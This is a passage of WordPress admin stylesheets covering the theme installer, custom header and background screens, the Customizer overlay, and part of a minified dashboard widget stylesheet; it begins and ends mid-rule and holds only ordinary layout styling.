"\f147"; content: "\f147" / ''; display: inline-block; font: normal 20px/1 'dashicons'; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; vertical-align: top; } .theme-install.updated-message:before { content: ""; } .theme-install-php .wp-filter { padding-left: 20px; } /* Override column gap adjustment in media library. */ @media only screen and (max-width: 1000px) { .theme-install-php .wp-filter p.search-box { column-gap: .5rem; } } .theme-install-php a.upload, .theme-install-php a.browse-themes { cursor: pointer; } .upload-view-toggle .browse, .plugin-install-tab-upload .upload-view-toggle .upload { display: none; } .plugin-install-tab-upload .upload-view-toggle .browse { display: inline; } .upload-theme, .upload-plugin { box-sizing: border-box; display: none; margin: 0; padding: 50px 0; width: 100%; overflow: hidden; position: relative; top: 10px; text-align: center; } .show-upload-view .upload-theme, .show-upload-view .upload-plugin, .show-upload-view .upload-plugin-wrap, .plugin-install-tab-upload .upload-plugin { display: block; } .upload-theme .wp-upload-form, .upload-plugin .wp-upload-form { position: relative; margin: 30px; display: inline-flex; justify-content: space-between; align-items: center; border: 1px solid #c3c4c7; background: #f6f7f7; } .upload-theme .wp-upload-form input[type="file"], .upload-plugin .wp-upload-form input[type="file"] { background: transparent; margin: 0; padding: 30px 0 30px 30px; } .wp-upload-form input[type="submit"].button { margin-right: 30px; } .upload-theme .install-help, .upload-plugin .install-help { color: #50575e; /* #f1f1f1 background */ font-size: 18px; font-style: normal; margin: 0; padding: 0; text-align: center; } p.no-themes, p.no-themes-local { clear: both; color: #646970; font-size: 18px; font-style: normal; margin: 0; padding: 100px 0; text-align: center; display: none; } .no-results p.no-themes { display: block; } .theme-install-php .add-new-theme { display: none !important; } @media only screen and (max-width: 1120px) { .upload-plugin .wp-upload-form, .upload-theme .wp-upload-form { margin: 20px 0; max-width: 100%; } .upload-theme .install-help { font-size: 15px; padding: 20px 0 0; } } .theme-details .theme-rating { line-height: 1.9; } .theme-details .star-rating { display: inline; } .theme-details .num-ratings, .theme-details .no-rating { font-size: 11px; color: #646970; } .theme-details .no-rating { display: block; line-height: 1.9; } .update-from-upload-comparison { border-top: 1px solid #dcdcde; border-bottom: 1px solid #dcdcde; text-align: left; margin: 1rem 0 1.4rem; border-collapse: collapse; width: 100%; } .update-from-upload-comparison tr:last-child td { height: 1.4rem; vertical-align: top; } .update-from-upload-comparison tr:first-child th { font-weight: bold; height: 1.4rem; vertical-align: bottom; } .update-from-upload-comparison td.name-label { text-align: right; } .update-from-upload-comparison td, .update-from-upload-comparison th { padding: 0.4rem 1.4rem; } .update-from-upload-comparison td.warning { color: #d63638; } .update-from-upload-actions { margin-top: 1.4rem; } /*------------------------------------------------------------------------------ 16.3 - Custom Header Screen ------------------------------------------------------------------------------*/ .appearance_page_custom-header #headimg { border: 1px solid #dcdcde; overflow: hidden; width: 100%; } .appearance_page_custom-header #upload-form p label { font-size: 12px; } .appearance_page_custom-header .available-headers .default-header { float: left; margin: 0 20px 20px 0; } .appearance_page_custom-header .random-header { clear: both; margin: 0 20px 20px 0; vertical-align: middle; } .appearance_page_custom-header .available-headers label input, .appearance_page_custom-header .random-header label input { margin-right: 10px; } .appearance_page_custom-header .available-headers label img { vertical-align: middle; } /*------------------------------------------------------------------------------ 16.4 - Custom Background Screen ------------------------------------------------------------------------------*/ div#custom-background-image { min-height: 100px; border: 1px solid #dcdcde; } div#custom-background-image img { max-width: 400px; max-height: 300px; } .background-position-control input[type="radio"]:checked ~ .button { background: #f0f0f1; border-color: #8c8f94; box-shadow: inset 0 2px 5px -3px rgba(0, 0, 0, 0.5); z-index: 1; } .background-position-control input[type="radio"]:focus ~ .button { border-color: #4f94d4; box-shadow: inset 0 2px 5px -3px rgba(0, 0, 0, 0.5), 0 0 3px rgba(34, 113, 177, 0.8); color: #1d2327; } .background-position-control .background-position-center-icon, .background-position-control .background-position-center-icon:before { display: inline-block; line-height: 1; text-align: center; transition: background-color .1s ease-in; } .background-position-control .background-position-center-icon { height: 20px; margin-top: 13px; vertical-align: top; width: 20px; } .background-position-control .background-position-center-icon:before { background-color: #50575e; border-radius: 50%; content: ""; height: 12px; width: 12px; } .background-position-control .button:hover .background-position-center-icon:before, .background-position-control input[type="radio"]:focus ~ .button .background-position-center-icon:before { background-color: #1d2327; } .background-position-control .button-group { display: block; } .background-position-control .button-group .button { border-radius: 0; box-shadow: none; /* Following properties are overridden by buttons responsive styles (see: wp-includes/css/buttons.css). */ height: 40px !important; line-height: 2.9 !important; margin: 0 -1px 0 0 !important; padding: 0 10px 1px !important; position: relative; } .background-position-control .button-group .button:active, .background-position-control .button-group .button:hover, .background-position-control .button-group .button:focus { z-index: 1; } .background-position-control .button-group:last-child .button { box-shadow: 0 1px 0 #c3c4c7; } .background-position-control .button-group > label { margin: 0 !important; } .background-position-control .button-group:first-child > label:first-child .button { border-radius: 3px 0 0; } .background-position-control .button-group:first-child > label:first-child .dashicons { transform: rotate( 45deg ); } .background-position-control .button-group:first-child > label:last-child .button { border-radius: 0 3px 0 0; } .background-position-control .button-group:first-child > label:last-child .dashicons { transform: rotate( -45deg ); } .background-position-control .button-group:last-child > label:first-child .button { border-radius: 0 0 0 3px; } .background-position-control .button-group:last-child > label:first-child .dashicons { transform: rotate( -45deg ); } .background-position-control .button-group:last-child > label:last-child .button { border-radius: 0 0 3px; } .background-position-control .button-group:last-child > label:last-child .dashicons { transform: rotate( 45deg ); } .background-position-control .button-group + .button-group { margin-top: -1px; } /*------------------------------------------------------------------------------ 23.0 - Full Overlay w/ Sidebar ------------------------------------------------------------------------------*/ body.full-overlay-active { overflow: hidden; /* Hide all the content, the Customizer overlay is then made visible to be the only available content. */ visibility: hidden; } .wp-full-overlay { background: transparent; z-index: 500000; position: fixed; overflow: visible; top: 0; bottom: 0; left: 0; right: 0; height: 100%; min-width: 0; } .wp-full-overlay-sidebar { box-sizing: border-box; position: fixed; min-width: 300px; max-width: 600px; width: 18%; height: 100%; top: 0; bottom: 0; left: 0; padding: 0; margin: 0; z-index: 10; background: #f0f0f1; border-right: none; } .wp-full-overlay.collapsed .wp-full-overlay-sidebar { overflow: visible; } .wp-full-overlay.collapsed, .wp-full-overlay.expanded .wp-full-overlay-sidebar { margin-left: 0 !important; } .wp-full-overlay.expanded { margin-left: 300px; } .wp-full-overlay.collapsed .wp-full-overlay-sidebar { margin-left: -300px; } @media screen and (min-width: 1667px) { .wp-full-overlay.expanded { margin-left: 18%; } .wp-full-overlay.collapsed .wp-full-overlay-sidebar { margin-left: -18%; } } @media screen and (min-width: 3333px) { .wp-full-overlay.expanded { margin-left: 600px; } .wp-full-overlay.collapsed .wp-full-overlay-sidebar { margin-left: -600px; } } .wp-full-overlay-sidebar:after { content: ""; display: block; position: absolute; top: 0; bottom: 0; right: 0; width: 3px; z-index: 1000; } .wp-full-overlay-main { position: absolute; left: 0; right: 0; top: 0; bottom: 0; height: 100%; } .wp-full-overlay-sidebar .wp-full-overlay-header { position: absolute; left: 0; right: 0; height: 45px; padding: 0 15px; line-height: 3.2; z-index: 10; margin: 0; border-top: none; box-shadow: none; } .wp-full-overlay-sidebar .wp-full-overlay-header a.back { margin-top: 3px; /* Vertically center 40px button in 45px header */ } .wp-full-overlay-sidebar .wp-full-overlay-footer { bottom: 0; border-bottom: none; border-top: none; box-shadow: none; } .wp-full-overlay-sidebar .wp-full-overlay-sidebar-content { position: absolute; top: 45px; bottom: 45px; left: 0; right: 0; overflow: auto; } /* Close & Navigation Links */ .theme-install-overlay .wp-full-overlay-sidebar .wp-full-overlay-header { padding: 0; } .theme-install-overlay .close-full-overlay, .theme-install-overlay .previous-theme, .theme-install-overlay .next-theme { display: block; position: relative; float: left; width: 45px; height: 45px; background: #f0f0f1; border-right: 1px solid #dcdcde; color: #3c434a; cursor: pointer; text-decoration: none; transition: color .1s ease-in-out, background .1s ease-in-out; } .theme-install-overlay .close-full-overlay:hover, .theme-install-overlay .close-full-overlay:focus, .theme-install-overlay .previous-theme:hover, .theme-install-overlay .previous-theme:focus, .theme-install-overlay .next-theme:hover, .theme-install-overlay .next-theme:focus { background: #dcdcde; border-color: #c3c4c7; color: #000; outline: none; box-shadow: none; } .theme-install-overlay .close-full-overlay:before { font: normal 22px/1 dashicons; content: "\f335"; content: "\f335" / ''; position: relative; top: 7px; left: 13px; } .theme-install-overlay .previous-theme:before { font: normal 20px/1 dashicons; content: "\f341"; content: "\f341" / ''; position: relative; top: 6px; left: 14px; } .theme-install-overlay .next-theme:before { font: normal 20px/1 dashicons; content: "\f345"; content: "\f345" / ''; position: relative; top: 6px; left: 13px; } .theme-install-overlay .previous-theme.disabled, .theme-install-overlay .next-theme.disabled, .theme-install-overlay .previous-theme.disabled:hover, .theme-install-overlay .previous-theme.disabled:focus, .theme-install-overlay .next-theme.disabled:hover, .theme-install-overlay .next-theme.disabled:focus { color: #c3c4c7; background: #f0f0f1; cursor: default; pointer-events: none; } .theme-install-overlay .close-full-overlay, .theme-install-overlay .previous-theme, .theme-install-overlay .next-theme { border-left: 0; border-top: 0; border-bottom: 0; } .theme-install-overlay .close-full-overlay:before, .theme-install-overlay .previous-theme:before, .theme-install-overlay .next-theme:before { top: 2px; left: 0; } /* Collapse Button */ .wp-core-ui .wp-full-overlay .collapse-sidebar { position: fixed; bottom: 0; left: 0; padding: 9px 0 9px 10px; height: 45px; color: #646970; outline: 0; line-height: 1; background-color: transparent !important; border: none !important; box-shadow: none !important; border-radius: 0 !important; } .wp-core-ui .wp-full-overlay .collapse-sidebar:hover, .wp-core-ui .wp-full-overlay .collapse-sidebar:focus { color: #2271b1; } .wp-full-overlay .collapse-sidebar-arrow, .wp-full-overlay .collapse-sidebar-label { display: inline-block; vertical-align: middle; line-height: 1.6; } .wp-full-overlay .collapse-sidebar-arrow { width: 20px; height: 20px; margin: 0 2px; /* avoid the focus box-shadow to be cut-off */ border-radius: 50%; overflow: hidden; } .wp-full-overlay .collapse-sidebar:hover .collapse-sidebar-arrow, .wp-full-overlay .collapse-sidebar:focus .collapse-sidebar-arrow { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .wp-full-overlay .collapse-sidebar-label { margin-left: 3px; } .wp-full-overlay.collapsed .collapse-sidebar-label { display: none; } .wp-full-overlay .collapse-sidebar-arrow:before { display: block; content: "\f148"; content: "\f148" / ''; background: #f0f0f1; font: normal 20px/1 dashicons; padding: 0; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .wp-core-ui .wp-full-overlay.collapsed .collapse-sidebar { padding: 9px 10px; } /* rtl:ignore */ .wp-full-overlay.collapsed .collapse-sidebar-arrow:before, .rtl .wp-full-overlay .collapse-sidebar-arrow:before { transform: rotate(180.001deg); /* Firefox: promoting to its own layer to trigger anti-aliasing */ } .rtl .wp-full-overlay.collapsed .collapse-sidebar-arrow:before { transform: none; } /* Animations */ @media (prefers-reduced-motion: no-preference) { .wp-full-overlay, .wp-full-overlay-sidebar, .wp-full-overlay .collapse-sidebar, .wp-full-overlay-main { transition-property: left, right, top, bottom, width, margin; transition-duration: 0.2s; } } /* Device/preview size toggles */ .wp-full-overlay { background: #1d2327; } .wp-full-overlay-main { background-color: #f0f0f1; } .expanded .wp-full-overlay-footer { position: fixed; bottom: 0; left: 0; min-width: 299px; max-width: 599px; width: 18%; width: calc( 18% - 1px ); height: 45px; border-top: 1px solid #dcdcde; background: #f0f0f1; } .wp-full-overlay-footer .devices-wrapper { float: right; } .wp-full-overlay-footer .devices { position: relative; background: #f0f0f1; box-shadow: -20px 0 10px -5px #f0f0f1; } .wp-full-overlay-footer .devices button { cursor: pointer; background: transparent; border: none; height: 45px; padding: 0 3px; margin: 0 0 0 -4px; box-shadow: none; border-top: 1px solid transparent; border-bottom: 4px solid transparent; transition: .15s color ease-in-out, .15s background-color ease-in-out, .15s border-color ease-in-out; } .wp-full-overlay-footer .devices button:focus { box-shadow: none; outline: none; } .wp-full-overlay-footer .devices button:before { display: inline-block; -webkit-font-smoothing: antialiased; font: normal 20px/30px "dashicons"; vertical-align: top; margin: 3px 0; padding: 4px 8px; color: #646970; } .wp-full-overlay-footer .devices button.active { border-bottom-color: #1d2327; } .wp-full-overlay-footer .devices button:hover, .wp-full-overlay-footer .devices button:focus { background-color: #fff; } .wp-full-overlay-footer .devices button:focus, .wp-full-overlay-footer .devices button.active:hover { border-bottom-color: #2271b1; } .wp-full-overlay-footer .devices button.active:before { color: #1d2327; } .wp-full-overlay-footer .devices button:hover:before, .wp-full-overlay-footer .devices button:focus:before { color: #2271b1; } .wp-full-overlay-footer .devices .preview-desktop:before { content: "\f472"; content: "\f472" / ''; } .wp-full-overlay-footer .devices .preview-tablet:before { content: "\f471"; content: "\f471" / ''; } .wp-full-overlay-footer .devices .preview-mobile:before { content: "\f470"; content: "\f470" / ''; } @media screen and (max-width: 1024px) { .wp-full-overlay-footer .devices { display: none; } } .collapsed .wp-full-overlay-footer .devices button:before { display: none; } .preview-mobile .wp-full-overlay-main { margin: auto 0 auto -160px; width: 320px; height: 480px; max-height: 100%; max-width: 100%; left: 50%; } .preview-tablet .wp-full-overlay-main { margin: auto 0 auto -360px; width: 720px; /* Size is loosely based on a typical "tablet" device size. Intentionally ambiguous - this does not represent any particular device precisely. */ height: 1080px; max-height: 100%; max-width: 100%; left: 50%; } /*------------------------------------------------------------------------------ 24.0 - Customize Loader ------------------------------------------------------------------------------*/ .no-customize-support .hide-if-no-customize, .customize-support .hide-if-customize, .no-customize-support.wp-core-ui .hide-if-no-customize, .no-customize-support .wp-core-ui .hide-if-no-customize, .customize-support.wp-core-ui .hide-if-customize, .customize-support .wp-core-ui .hide-if-customize { display: none; } #customize-container, #customize-controls .notice.notification-overlay { background: #f0f0f1; z-index: 500000; position: fixed; overflow: visible; top: 0; bottom: 0; left: 0; right: 0; height: 100%; } #customize-container { display: none; } /* Make the Customizer and Theme installer overlays the only available content. */ #customize-container, .theme-install-overlay { visibility: visible; } .customize-loading #customize-container iframe { opacity: 0; } #customize-container iframe, .theme-install-overlay iframe { height: 100%; width: 100%; z-index: 20; transition: opacity 0.3s; } #customize-controls { margin-top: 0; } .theme-install-overlay { display: none; } .theme-install-overlay.single-theme { display: block; } .install-theme-info { display: none; padding: 10px 20px 60px; } .single-theme .install-theme-info { padding-top: 15px; } .theme-install-overlay .install-theme-info { display: block; } .install-theme-info .theme-install { float: right; margin-top: 18px; } .install-theme-info .theme-name { font-size: 16px; line-height: 1.5; margin-bottom: 0; margin-top: 0; } .install-theme-info .theme-screenshot { margin: 15px 0; width: 258px; border: 1px solid #c3c4c7; position: relative; overflow: hidden; } .install-theme-info .theme-screenshot > img { width: 100%; height: auto; position: absolute; left: 0; top: 0; } .install-theme-info .theme-screenshot:after { content: ""; display: block; padding-top: 66.66666666%; } .install-theme-info .theme-details { overflow: hidden; } .theme-details .theme-version { margin: 15px 0; } .theme-details .theme-description { float: left; color: #646970; line-height: 1.6; max-width: 100%; } .theme-install-overlay .wp-full-overlay-header .button { float: right; margin: 7px 10px 0 0; /* Vertically center 32px button in 45px header */ min-height: 32px; line-height: 2.30769231; /* 30px for 32px height with 13px font */ } .theme-install-overlay .wp-full-overlay-sidebar { background: #f0f0f1; border-right: 1px solid #dcdcde; } .theme-install-overlay .wp-full-overlay-sidebar-content { background: #fff; border-top: 1px solid #dcdcde; border-bottom: 1px solid #dcdcde; } .theme-install-overlay .wp-full-overlay-main { position: absolute; z-index: 0; background-color: #f0f0f1; } .customize-loading #customize-container { background-color: #f0f0f1; } #customize-preview.wp-full-overlay-main:before, .customize-loading #customize-container:before, #customize-controls .notice.notification-overlay.notification-loading:before, .theme-install-overlay .wp-full-overlay-main:before { content: ""; display: block; width: 20px; height: 20px; position: absolute; left: 50%; top: 50%; z-index: -1; margin: -10px 0 0 -10px; transform: translateZ(0); background: transparent url(../images/spinner.gif) no-repeat center center; background-size: 20px 20px; } #customize-preview.wp-full-overlay-main.iframe-ready:before, .theme-install-overlay.iframe-ready .wp-full-overlay-main:before { background-image: none; } /* =Media Queries -------------------------------------------------------------- */ /** * HiDPI Displays */ @media print, (min-resolution: 120dpi) { .wp-full-overlay .collapse-sidebar-arrow { background-image: url(../images/arrows-2x.png); background-size: 15px 123px; } #customize-preview.wp-full-overlay-main:before, .customize-loading #customize-container:before, #customize-controls .notice.notification-overlay.notification-loading:before, .theme-install-overlay .wp-full-overlay-main:before { background-image: url(../images/spinner-2x.gif); } } @media screen and (max-width: 782px) { .available-theme .action-links .delete-theme { float: none; margin: 0; padding: 0; clear: both; } .available-theme .action-links .delete-theme a { padding: 0; } .broken-themes table { width: 100%; } .theme-install-overlay .wp-full-overlay-header .button { font-size: 13px; } .theme-browser .theme .theme-actions .button { margin-bottom: 0; } .theme-browser .theme.active .theme-actions, .theme-browser .theme .theme-actions { padding-top: 4px; padding-bottom: 4px; } .upload-plugin .wp-upload-form, .upload-theme .wp-upload-form { width: 100%; box-sizing: border-box; } .upload-plugin .wp-upload-form input[type=file], .upload-theme .wp-upload-form input[type=file] { padding: 30px 0 30px 30px; width: 100%; } } /*! This file is auto-generated */ #wpbody-content #dashboard-widgets.columns-1 .postbox-container{width:100%}#wpbody-content #dashboard-widgets.columns-2 .postbox-container{width:49.5%}#wpbody-content #dashboard-widgets.columns-2 #postbox-container-2,#wpbody-content #dashboard-widgets.columns-2 #postbox-container-3,#wpbody-content #dashboard-widgets.columns-2 #postbox-container-4{float:right;width:50.5%}#wpbody-content #dashboard-widgets.columns-3 .postbox-container{width:33.5%}#wpbody-content #dashboard-widgets.columns-3 #postbox-container-1{width:33%}#wpbody-content #dashboard-widgets.columns-3 #postbox-container-3,#wpbody-content #dashboard-widgets.columns-3 #postbox-container-4{float:right}#wpbody-content #dashboard-widgets.columns-4 .postbox-container{width:25%}#dashboard-widgets .postbox-container{width:25%}#dashboard-widgets-wrap .columns-3 #postbox-container-4 .empty-container{border:none!important}#dashboard-widgets-wrap{overflow:hidden;margin:0 -8px}#dashboard-widgets .postbox{border-radius:8px}#dashboard-widgets .postbox-header .hndle{padding:12px 16px}#dashboard-widgets .postbox .inside{margin-bottom:0}#dashboard-widgets .meta-box-sortables{display:flow-root;min-height:0;margin:0 8px 20px}#dashboard-widgets .meta-box-sortables:not(:empty){margin-bottom:16px}#dashboard-widgets .postbox-container .empty-container{outline:2px dashed rgb(0,0,0,.15);outline-offset:-2px;border-radius:8px;height:250px;margin:4px}.is-dragging-metaboxes #dashboard-widgets .meta-box-sortables{border-radius:8px;background:rgb(var(--wp-admin-theme-color--rgb),.04);min-height:100px}.is-dragging-metaboxes #dashboard-widgets .postbox-container .empty-container{background:rgb(0,0,0,.01)}#dashboard-widgets .postbox-container .empty-container:after{content:attr(data-emptystring);margin:auto;position:absolute;top:50%;left:0;right:0;transform:translateY(-50%);padding:0 2em;text-align:center;color:#646970;font-size:16px;line-height:1.5;display:none}#the-comment-list td.comment p.comment-author{margin-top:0;margin-left:0}#the-comment-list p.comment-author img{float:left;margin-right:8px}#the-comment-list p.comment-author strong a{border:none}#the-comment-list td{vertical-align:top}#the-comment-list td.comment{word-wrap:break-word}#the-comment-list td.comment img{max-width:100%}.index-php #screen-meta-links{margin:0 20px 8px 0}.welcome-panel{position:relative;overflow:auto;margin:16px 0;border-radius:8px;font-size:14px;line-height:1.3;clear:both}.welcome-panel h2{margin:0;font-size:48px;font-weight:600;line-height:1.25}.welcome-panel h3{margin:0;font-size:20px;font-weight:400;line-height:1.4}.welcome-panel p{font-size:inherit;line-height:inherit}.welcome-panel-header{position:relative;color:#fff}.welcome-panel-header-image{position:absolute!important;top:0;right:0;bottom:0;left:0;z-index:0!important;overflow:hidden}.welcome-panel-header-image svg{display:block;margin:auto;width:100%;height:100%}.rtl .welcome-panel-header-image svg{transform:scaleX(-1)}.welcome-panel-header *{color:inherit;position:relative;z-index:1}.welcome-panel-header a:focus,.welcome-panel-header a:hover{color:inherit;text-decoration:none}.welcome-panel .welcome-panel-close:focus,.welcome-panel-header a:focus{outline-color:currentColor;outline-offset:1px;box-shadow:none}.welcome-panel-header p{margin:.5em 0 0;font-size:20px;line-height:1.4}.welcome-panel .welcome-panel-close{display:flex;align-items:center;position:absolute;top:10px;right:10px;padding:10px 15px;font-size:13px;line-height:1.23076923;text-decoration:none;z-index:1}.welcome-panel .welcome-panel-close:before{transition:all .1s ease-in-out;content:'\f335';font-size:24px;color:#fff}.welcome-panel .welcome-panel-close{color:#fff}.welcome-panel .welcome-panel-close:focus,.welcome-panel .welcome-panel-close:focus::before,.welcome-panel .welcome-panel-close:hover,.welcome-panel .welcome-panel-close:hover::before{color:#fff972}.wp-core-ui .welcome-panel .button.button-hero{margin:15px 13px 3px 0;padding:12px 36px;height:auto;line-height:1.4285714;white-space:normal}.welcome-panel-content{min-height:400px;display:flex;flex-direction:column;justify-content:space-between}.welcome-panel-header-wrap{background-color:#151515}.welcome-panel-header{box-sizing:border-box;margin-left:auto;margin-right:auto;max-width:1500px;width:100%;padding:48px 0 80px 48px}.welcome-panel .welcome-panel-column-container{box-sizing:border-box;width:100%;clear:both;display:grid;z-index:1;padding:24px;grid-template-columns:repeat(3,1fr);gap:32px;align-self:flex-end;background:#fff;border:1px solid #c3c4c7;border-top:0;border-radius:0 0 8px 8px}[class*=welcome-panel-icon]{height:60px;width:60px;background-position:center;background-size:24px 24px;background-repeat:no-repeat;border-radius:100%}.welcome-panel-column>svg{margin-top:4px}.welcome-panel-column{display:grid;grid-template-columns:min-content 1fr;gap:24px}.welcome-panel-icon-pages{background-image:url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24'%3E%3Cpath fill='%23fff' d='M7 13.8h6v-1.5H7v1.5zM18 16V4c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v12c0 1.1.9 2 2 2h10c1.1 0 2-.9 2-2zM5.5 16V4c0-.3.2-.5.5-.5h10c.3 0 .5.2.5.5v12c0 .3-.2.5-.5.5H6c-.3 0-.5-.2-.5-.5zM7 10.5h8V9H7v1.5zm0-3.3h8V5.8H7v1.4zM20.2 6v13c0 .7-.6 1.2-1.2 1.2H8v1.5h11c1.5 0 2.7-1.2 2.7-2.8V6h-1.5z' /%3E%3C/svg%3E")}.welcome-panel-icon-layout{background-image:url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24'%3E%3Cpath fill='%23fff' d='M18 5.5H6a.5.5 0 00-.5.5v3h13V6a.5.5 0 00-.5-.5zm.5 5H10v8h8a.5.5 0 00.5-.5v-7.5zm-10 0h-3V18a.5.5 0 00.5.5h2.5v-8zM6 4h12a2 2 0 012 2v12a2 2 0 01-2 2H6a2 2 0 01-2-2V6a2 2 0 012-2z' /%3E%3C/svg%3E")}.welcome-panel-icon-styles{background-image:url("data:image/svg+xml,%3Csvg viewBox='0 0 24 24' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath fill='%23fff' d='M12 4c-4.4 0-8 3.6-8 8v.1c0 4.1 3.2 7.5 7.2 7.9h.8c4.4 0 8-3.6 8-8s-3.6-8-8-8zm0 15V5c3.9 0 7 3.1 7 7s-3.1 7-7 7z' /%3E%3C/svg%3E")}.welcome-panel .welcome-widgets-menus{line-height:1.14285714}.welcome-panel .welcome-panel-column ul{margin:.8em 1em 1em 0}.welcome-panel li{font-size:14px}.welcome-panel li a{text-decoration:none}.welcome-panel .welcome-panel-column li{line-height:1.14285714;list-style-type:none;padding:0 0 8px}.welcome-panel .welcome-icon{background:0 0!important}#dashboard_right_now .search-engines-info:before,#dashboard_right_now li a:before,#dashboard_right_now li span:before,.welcome-panel .welcome-icon:before{color:#646970;font:normal 20px/1 dashicons;display:inline-block;padding:0 10px 0 0;position:relative;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;text-decoration:none!important;vertical-align:top}.welcome-panel .welcome-edit-page:before,.welcome-panel .welcome-write-blog:before{content:"\f119";content:"\f119"/'';top:-3px}.welcome-panel .welcome-add-page:before{content:"\f132";content:"\f132"/'';top:-1px}.welcome-panel .welcome-setup-home:before{content:"\f102";content:"\f102"/'';top:-1px}.welcome-panel .welcome-view-site:before{content:"\f115";content:"\f115"/'';top:-2px}.welcome-panel .welcome-widgets-menus:before{content:"\f116";content:"\f116"/'';top:-2px}.welcome-panel .welcome-widgets:before{content:"\f538";content:"\f538"/'';top:-2px}.welcome-panel .welcome-menus:before{content:"\f163";content:"\f163"/'';top:-2px}.welcome-panel .welcome-comments:before{content:"\f117";content:"\f117"/'';top:-1px}.welcome-panel .welcome-learn-more:before{content:"\f118";content:"\f118"/'';top:-1px}#dashboard_right_now .search-engines-info:before,#dashboard_right_now li a:before,#dashboard_right_now li>span:before{padding:0 5px 0 0;content:"\f159";content:"\f159"/''}#dashboard_right_now .page-count a:before,#dashboard_right_now .page-count span:before{content:"\f105";content:"\f105"/''}#dashboard_right_now .post-count a:before,#dashboard_right_now .post-count span:before{content:"\f109";content:"\f109"/''}#dashboard_right_now .comment-count a:before{content:"\f101";content:"\f101"/''}#dashboard_right_now .comment-mod-count a:before{content:"\f125";content:"\f125"/''}#dashboard_right_now .storage-count a:before{content:"\f104";content:"\f104"/''}#dashboard_right_now .storage-count.warning a:before{content:"\f153";content:"\f153"/''}#dashboard_right_now .search-engines-info:before{content:"\f348";content:"\f348"/'';color:#d63638}.community-events-errors{margin:0}.community-events-loading{padding:10px 12px 8px}.community-events{margin-bottom:6px;padding:0 12px}.community-events .spinner{margin:0 2px 0}.community-events form[aria-hidden=true],.community-events-errors [aria-hidden=true],.community-events-errors[aria-hidden=true],.community-events-loading[aria-hidden=true],.community-events[aria-hidden=true]{display:none}.community-events .activity-block:first-child,.community-events h2{padding-top:12px;padding-bottom:10px}.community-events-form{margin:15px 0 5px;display:flex;gap:5px;align-items:center;flex-wrap:wrap}.community-events-form .regular-text{width:40%;margin:0;min-height:32px;padding:0 8px}#dashboard-widgets .community-events-form .button{min-height:32px;line-height:2.30769231;padding:0 12px}.community-events li.event-none{border-left:4px solid var(--wp-admin-theme-color,#3858e9)}#dashboard-widgets .community-events li.event-none a{text-decoration:underline}.community-events-form label{line-height:2.14285714}.community-events .activity-block>p{margin-bottom:0;display:inline}.community-events-toggle-location{vertical-align:middle}#dashboard-widgets .community-events-cancel.button-link{text-decoration:underline}.community-events ul{background-color:rgba(var(--wp-admin-theme-color--rgb),.08);padding-left:0;padding-right:0;padding-bottom:0}.community-events li{margin:0;padding:8px 12px;color:#2c3338}.community-events li:first-child{border-top:1px solid #e9e9ed}.community-events li~li{border-top:1px solid #e9e9ed}.community-events .activity-block.last{border-bottom:1px solid #e9e9ed;padding-top:0;margin-top:-1px}.community-events .event-info{display:block}.community-events .ce-separator::before{content:"\2022";content:"\2022"/''}.event-icon{height:18px;padding-right:10px;width:18px;display:none}.event-icon:before{color:#646970;font-size:18px}.event-meetup .event-icon:before{content:"\f484";content:"\f484"/''}.event-wordcamp .event-icon:before{content:"\f486";content:"\f486"/''}.community-events .event-title{font-weight:600;display:block}.community-events .event-date,.community-events .event-time{display:block}.community-events-footer{margin-top:0;margin-bottom:0;padding:12px;border-top:1px solid #f0f0f1;color:#646970}.community-events-footer .screen-reader-text{height:inherit;white-space:nowrap}#dashboard_primary .inside{margin:0;padding:0}#dashboard_primary .widget-loading{padding:12px 12px 0;margin-bottom:1em!important}#dashboard_primary .inside .notice{margin:0}body #dashboard-widgets .postbox form .submit{margin:0}.dashboard-widget-control-form p{margin-top:0}.rssSummary{color:#646970;margin-top:4px}#dashboard_primary .rss-widget{font-size:13px;padding:0 12px}#dashboard_primary .rss-widget:last-child{border-bottom:none;padding-bottom:8px}#dashboard_primary .rss-widget a{font-weight:400}#dashboard_primary .rss-widget span,#dashboard_primary .rss-widget span.rss-date{color:#646970}#dashboard_primary .rss-widget span.rss-date{margin-left:12px}#dashboard_primary .rss-widget ul li{padding:4px 0;margin:0}#dashboard_right_now ul{margin:0;display:inline-block;width:100%}#dashboard_right_now li{width:50%;float:left;margin-bottom:10px}#dashboard_right_now .main p{margin:0}#dashboard_right_now #wp-version-message .button{float:right;position:relative;top:-5px;margin-left:5px}#dashboard_right_now p.search-engines-info{margin:1em 0}.mu-storage{overflow:hidden}#dashboard-widgets h3.mu-storage{margin:0 0 10px;padding:0;font-size:14px;font-weight:400}#network_dashboard_right_now p input{margin:2px 1px;vertical-align:middle}#dashboard_right_now .sub{color:#50575e;background:#f6f7f7;border-top:1px solid #f0f0f1;padding:10px 12px 6px}#dashboard_right_now .sub h3{color:#50575e}#dashboard_right_now .sub p{margin:0 0 1em}#dashboard_right_now .warning a:before,#dashboard_right_now .warning span:before{color:#d63638}#dashboard_quick_press .inside{margin:0;padding:0}#dashboard_quick_press div.updated{margin-bottom:10px;border:1px solid #f0f0f1;border-width:1px 1px 1px 0}#dashboard_quick_press form{margin:12px}#dashboard_quick_press .drafts{padding:10px 0 0}#dashboard_quick_press label{display:inline-block;margin-bottom:4px}#dashboard_quick_press input,#dashboard_quick_press textarea{box-sizing:border-box;margin:0}#dashboard-widgets .postbox form .submit{margin:-39px 0;float:right}#description-wrap{margin-top:12px}#quick-press textarea#content{min-height:90px;max-height:1300px;margin:0 0 8px;padding:8px 12px;resize:none}.js #dashboard_quick_press .drafts{border-top:1px solid #f0f0f1}#dashboard_quick_press .drafts abbr{border:none}#dashboard_quick_press .drafts .view-all{float:right;margin:0 12px 0 0}#dashboard_primary a.rsswidget{font-weight:400}#dashboard_quick_press .drafts ul{margin:0 12px}#dashboard_quick_press .drafts li{margin-bottom:1em}#dashboard_quick_press .drafts li time{color:#646970}#dashboard_quick_press .drafts p{margin:0;word-wrap:break-word}#dashboard_quick_press 